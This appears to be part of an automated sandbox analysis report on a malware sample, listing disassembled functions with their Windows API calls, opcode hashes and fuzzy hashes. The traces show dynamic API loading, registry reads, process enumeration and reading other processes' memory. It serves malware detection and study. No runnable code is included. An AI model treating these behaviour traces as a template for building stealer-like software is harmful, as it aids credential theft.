API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$x@
API String ID: 3448701045-2507878009
Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A

Function 02458FE7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,02458F02,00000000,?,?,00000000), ref: 02458FF9
std::exception::exception.LIBCMT ref: 02459014
__CxxThrowException@8.LIBCMT ref: 02459029

Strings

PC, xrefs: 02459022
PC, xrefs: 0245900A, 0245901E, 02459021

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: PC$PC
API String ID: 3448701045-3524912142
Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction ID: e540599de98226a18535dc73631ac5be525e4aa2220d6f849242194d59692e51
Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction Fuzzy Hash: E9E02B7080021996CB28EBB58C006BF7378DF00714F400B1FDC2652281EB7181048AD5

Function 02467967 Relevance: 7.9, APIs: 5, Instructions: 406stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02459257: ??2@YAPAXI@Z.MSVCRT(00000020), ref: 02459260

Part of subcall function 02474A67: LoadLibraryA.KERNEL32(0043573C,?,024679A8), ref: 02474A6D
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,00435748), ref: 02474A83
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,00435750), ref: 02474A94
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,0043575C), ref: 02474AA5
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,00435768), ref: 02474AB6
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,00435770), ref: 02474AC7
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,0043577C), ref: 02474AD8
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,00435784), ref: 02474AE9
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,0043578C), ref: 02474AFA
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,0043579C), ref: 02474B0B
Part of subcall function 02474A67: GetProcAddress.KERNEL32(00000000,004357A8), ref: 02474B1C

StrCmpCA.SHLWAPI(?,00638AAC), ref: 024679D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 02467AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02467AE7
lstrcpy.KERNEL32(00000000,?), ref: 02467B44

Part of subcall function 024774A7: lstrcpy.KERNEL32(00000000), ref: 024774C1

Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 0245169E
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516C0
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516E2
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 02451746

Part of subcall function 02465E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02465E7C
Part of subcall function 02465E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02465EAB
Part of subcall function 02465E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02465EDC
Part of subcall function 02465E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02465F04
Part of subcall function 02465E47: lstrcat.KERNEL32(00000000,00000000), ref: 02465F0F
Part of subcall function 02465E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02465F37

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$AddressProc$??2@FolderLibraryLoadPathlstrcat
String ID:
API String ID: 3558977763-0
Opcode ID: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
Instruction ID: afe1ce71f2297a34ed499eeefd106d856f79ee05e35695ec72e3b1ae1c933ae4
Opcode Fuzzy Hash: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
Instruction Fuzzy Hash: E1F15F71A002058FDB24DF29C948BA9B7B2FF44318F19C1AED8189B391D735E946CF92

Function 02467E76 Relevance: 7.9, APIs: 5, Instructions: 367stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 024679D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 02467AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02467AE7
lstrcpy.KERNEL32(00000000,?), ref: 02467B44

Part of subcall function 024774A7: lstrcpy.KERNEL32(00000000), ref: 024774C1

Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 0245169E
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516C0
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 024516E2
Part of subcall function 02451677: lstrcpy.KERNEL32(00000000,?), ref: 02451746

Part of subcall function 02465E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02465E7C
Part of subcall function 02465E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02465EAB
Part of subcall function 02465E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02465EDC
Part of subcall function 02465E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02465F04
Part of subcall function 02465E47: lstrcat.KERNEL32(00000000,00000000), ref: 02465F0F
Part of subcall function 02465E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02465F37

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction ID: 2018ebbb7151d5467fc7f869c6540edcf32fe8eb01f149d2342cb74e90a4feb8
Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction Fuzzy Hash: 3AF14071E002058FDB24DF29C548AA9B7B2FF44318F19C1AED8199B3A1D735E946CF91

Function 02467A84 Relevance: 7.9, APIs: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 024679D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 02467AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02467AE7
lstrcpy.KERNEL32(00000000,?), ref: 02467B44
StrCmpCA.SHLWAPI(?,00638D84), ref: 02467DE4

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction ID: 71cbf78fa34a79904e7faf036826590bf4e8b6d463edcf0e6d04f80cb0a20be9
Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction Fuzzy Hash: FAF14071E002058FDB24DF29C548AA9B7B2FF44318F19C1AED8189B3A1D735E942CF91

Function 02467D47 Relevance: 7.9, APIs: 5, Instructions: 363COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 024679D7
StrCmpCA.SHLWAPI(?,00638D84), ref: 02467DE4

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
Instruction ID: 001797b685b5faa6b971d036feaa3e2f758044ba9eb0ba9eb6297e17cd3c69c5
Opcode Fuzzy Hash: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
Instruction Fuzzy Hash: 44E14F71E002058FDB24DF29C548AA9BBB2FF44318F19C1AED8189B3A1D775E946CF91

Function 02459F37 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 02459F6F
LocalAlloc.KERNEL32(00000040,?), ref: 02459FA1
StrStrA.SHLWAPI(00000000,004351E8), ref: 02459FCA
memcmp.MSVCRT(?,0042DC44,00000005), ref: 0245A003

Strings

, xrefs: 0245A02C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID:
API String ID: 4154055062-3916222277
Opcode ID: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
Instruction ID: 3ccda71c142ca8892355067905b6938ef85abe261155f6ef656ed1c84e35d28b
Opcode Fuzzy Hash: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
Instruction Fuzzy Hash: C241AD71A006799BCB10EF75CC80AAF7BB6AF05708F04456AEC95A7353DB71A905CF90

Function 0247965F Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 02479697
GetCPInfo.KERNEL32(?,?), ref: 024796AA
memset.MSVCRT ref: 024796C2
setSBUpLow.LIBCMT ref: 02479798

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
Instruction ID: cd42b45b57c561a970eb75229d855ae008db7fc113f9c8637609b5b7fef6690c
Opcode Fuzzy Hash: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
Instruction Fuzzy Hash: 28310430A046818AEB259F35C8843FABFA19F02314F1889AFD8A1DF292C379C446C751

Function 02471D67 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 02471DB9

Part of subcall function 02471A67: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471A96
Part of subcall function 02471A67: lstrlen.KERNEL32(00638DEC), ref: 02471AA7
Part of subcall function 02471A67: lstrcpy.KERNEL32(00000000,00000000), ref: 02471ACE
Part of subcall function 02471A67: lstrcat.KERNEL32(00000000,00000000), ref: 02471AD9
Part of subcall function 02471A67: lstrcpy.KERNEL32(00000000,00000000), ref: 02471B08
Part of subcall function 02471A67: lstrlen.KERNEL32(00435564), ref: 02471B1A
Part of subcall function 02471A67: lstrcpy.KERNEL32(00000000,00000000), ref: 02471B3B
Part of subcall function 02471A67: lstrcat.KERNEL32(00000000,00435564), ref: 02471B47
Part of subcall function 02471A67: lstrcpy.KERNEL32(00000000,00000000), ref: 02471B76

sscanf.NTDLL ref: 02471DE1
SystemTimeToFileTime.KERNEL32(?,?), ref: 02471DFD
SystemTimeToFileTime.KERNEL32(?,?), ref: 02471E0D
ExitProcess.KERNEL32 ref: 02471E2A

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
String ID:
API String ID: 3040284667-0
Opcode ID: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
Instruction ID: 68e56fd94b48d7a0f6e8fc9dea0a1faf55e4d09de568caa68655f167db103ac2
Opcode Fuzzy Hash: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
Instruction Fuzzy Hash: 1221C3B1518301AF8354DF69D88489FBBF9EED8314F409A1EF5A9C3220E770D6058FA6

Function 02473337 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0247336D
RtlAllocateHeap.NTDLL(00000000), ref: 02473374
RegOpenKeyExA.ADVAPI32(80000002,006389D4,00000000,00020119,?), ref: 02473393
RegQueryValueExA.ADVAPI32(?,00638CEC,00000000,00000000,00000000,000000FF), ref: 024733AE
RegCloseKey.ADVAPI32(?), ref: 024733B8

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
Instruction ID: bfd630d199be926c91604f057900971578ec012a5389f2524410f5bac717fafe
Opcode Fuzzy Hash: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
Instruction Fuzzy Hash: EB118272A04204AFD714CF94DC45FABBB7DEB48711F00421AFA05D3280DB7459048BE1

Function 02472B17 Relevance: 7.5, APIs: 5, Instructions: 49registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02472B2C
RtlAllocateHeap.NTDLL(00000000), ref: 02472B33
RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02472AB0), ref: 02472B52
RegQueryValueExA.ADVAPI32(02472AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 02472B6C
RegCloseKey.ADVAPI32(02472AB0), ref: 02472B76

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: 03cf7ce01d5f8b7289de3fee3b378ac24cd7cb5bb6d0b734287ea244cd2ae395
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: D7019AB5A00318AFE314CFA09C59FEB7BADEB48755F200099FE4597241EBB059088BE0

Function 02451267 Relevance: 7.5, APIs: 5, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0245127C
RtlAllocateHeap.NTDLL(00000000), ref: 02451283
RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024512A0
RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024512BA
RegCloseKey.ADVAPI32(?), ref: 024512C4

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: aac378b256dd3622283568f9b1c7505117f2486953f4c75806f5b4dce51ffb12
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: 5EF09075A40308BFD7049BA09C4DFEB7B7DEB04755F100059BE09E2281D7B05A048BE0

Function 02479268 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02479274

Part of subcall function 02478A96: __getptd_noexit.LIBCMT ref: 02478A99
Part of subcall function 02478A96: __amsg_exit.LIBCMT ref: 02478AA6

__getptd.LIBCMT ref: 0247928B
__amsg_exit.LIBCMT ref: 02479299
__lock.LIBCMT ref: 024792A9
__updatetlocinfoEx_nolock.LIBCMT ref: 024792BD

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction ID: ce42d087cee41522fd4836fb281fe7f4ee0b31536e0ae6c7e75dde9322cab6d5
Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction Fuzzy Hash: 28F0B432D487009BD730BBBA5C05BDE73A1AF10724F10050FD4356B2D0DB6455409F59

Function 0246F247 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0246F27A
StrCmpCA.SHLWAPI(?,ERROR), ref: 0246F295
lstrcpy.KERNEL32(00000000,ERROR), ref: 0246F2F6

Strings

ERROR, xrefs: 0246F28F, 0246F2F0

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction ID: 289c881cc88942caa24e89f11a74a903c502bc131f1c144710c3e449b1f4915a
Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction Fuzzy Hash: F52130706115AA5BCB24FF79DC48AAA3BE5AF04308F00442BEC89DBA02DB75D804CF91

Function 00408740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408767

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

yxxx, xrefs: 00408749
yxxx, xrefs: 00408771
vector<T> too long, xrefs: 00408762

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx
API String ID: 2884196479-1517697755
Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9

Function 02458DB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(02457B55,02458B44,03C3C3C3,00000401,02457B55,?,00000000,?,02457B55,80000001), ref: 02458DD7
std::exception::exception.LIBCMT ref: 02458DF2
__CxxThrowException@8.LIBCMT ref: 02458E07

Strings

PC, xrefs: 02458E00

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: PC
API String ID: 3448701045-2975848930
Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction ID: fb30e08a75a82c97d5289156f87ecf17fa7507648da3603fd6cd8f6edcb6b4ff
Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction Fuzzy Hash: A0F0A7B160061597EB18E7A58C457FF73B8EF00304F44452EDD16E2241EB74D60985D6

Function 0246C347 Relevance: 6.4, APIs: 5, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C387

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
Instruction ID: d73de1cb9af663d4eb1c36c427a77d598da0777170511788059ddd08600edc67
Opcode Fuzzy Hash: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
Instruction Fuzzy Hash: 2231A070E002699BDB10EFB5DC8CA6E7BF6AF45308F04406BE881A7252D7B4C941DF96

Function 0246F077 Relevance: 6.3, APIs: 5, Instructions: 93stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246F0A6
lstrlen.KERNEL32(00000000), ref: 0246F0B4
lstrcpy.KERNEL32(00000000,00000000), ref: 0246F0DB
lstrlen.KERNEL32(00000000), ref: 0246F0E2
lstrcpy.KERNEL32(00000000,00435550), ref: 0246F116

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction ID: 7638f82a372b1ca1376c711ff6365a737c06e70abfab9d40f73a36e32ae76d34
Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction Fuzzy Hash: 1931A271A005A85BC721FF39DC48EAE7BA6AF00308F01442BEC85DBA13DB64DC059F91

Function 02473C57 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

Part of subcall function 02477477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02477495

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02473C9D
Process32First.KERNEL32(00000000,00000128), ref: 02473CB0
Process32Next.KERNEL32(00000000,00000128), ref: 02473CC6

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

CloseHandle.KERNEL32(00000000), ref: 02473DFE

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction ID: 6c73ffc4b7c6a39846e0f1b2cd75b565bb17b14a563dbaf55ebd797a5ec75dbf
Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction Fuzzy Hash: 3281E870900215CFC715CF18D948B96BBB2BB44329F29C1EEE4299B3A1D776D886DF90

Function 0246E8A7 Relevance: 6.2, APIs: 4, Instructions: 157stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0246E8F2
lstrcpy.KERNEL32(00000000,?), ref: 0246E927
lstrcat.KERNEL32(?,00000000), ref: 0246E933
lstrcat.KERNEL32(?,00638B00), ref: 0246E94C

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
Instruction ID: 0a983b46ad0f6909700a96620e3d472cb56656faba9cc9fe677a11ca0d754df6
Opcode Fuzzy Hash: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
Instruction Fuzzy Hash: AE518475600258AFD354EF64DC45FEA77EAAB84304F00841FBD9987291DE74E909CF92

Function 02472443 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02472469
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02472545
VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 024725A7
??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02472686), ref: 024725B9

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: MemoryProcessRead$QueryVirtual
String ID:
API String ID: 268806267-0
Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction ID: 74be2b91715452fad5f50d51a810127b6581d45cb3273d75407cddda7c20803a
Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
